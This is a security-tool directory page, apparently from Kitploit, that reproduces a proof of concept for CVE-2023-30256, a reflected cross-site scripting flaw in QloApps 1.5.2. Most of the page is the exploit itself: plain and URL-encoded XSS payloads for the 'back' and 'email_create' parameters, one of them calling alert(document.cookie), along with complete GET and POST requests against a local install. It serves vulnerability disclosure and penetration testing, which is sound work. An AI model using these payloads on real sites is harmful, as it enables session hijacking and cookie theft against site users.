Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-30256 — QloApp 1.5.2: Vulnerable to XSS on two Parameter (email_create and back) | Kitploit
Tools/GitHubGitHub/ahrixia/cve-2023-30256
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubahrixia/cve-2023-30256

CVE-2023-30256

QloApp 1.5.2: Vulnerable to XSS on two Parameter (email_create and back)

View Repository
313 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)

Webkul QloApps 1.5.2: Vulnerable to XSS on two Parameter (email_create and back)

Exploit - Proof of Concept (POC)

XXS: 'back' Parameter

root@kitploit:~
Payload (Parameter back – Plain text): 
[xss onfocus=alert(1) autofocus= xss] 

Payload (Parameter back – URL Encoded): 
[xss%20onfocus%3dalert(1)%20autofocus%3d%20xss]

Full GET Request (Parameter back): 
[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

image info

XXS: 'email_create' Parameter

root@kitploit:~
Payload (Parameter email_create – Plain text): 
[xss>xss] 

Payload (Parameter email_create – URL Encoded): 
[xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss]

POST Request (Parameter email_create) (POST REQUEST DATA ONLY): 
[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]

image info

Confirmed on: 30 March 2023

Vendor: QloApps [https://github.com/webkul/hotelcommerce]

Download Tool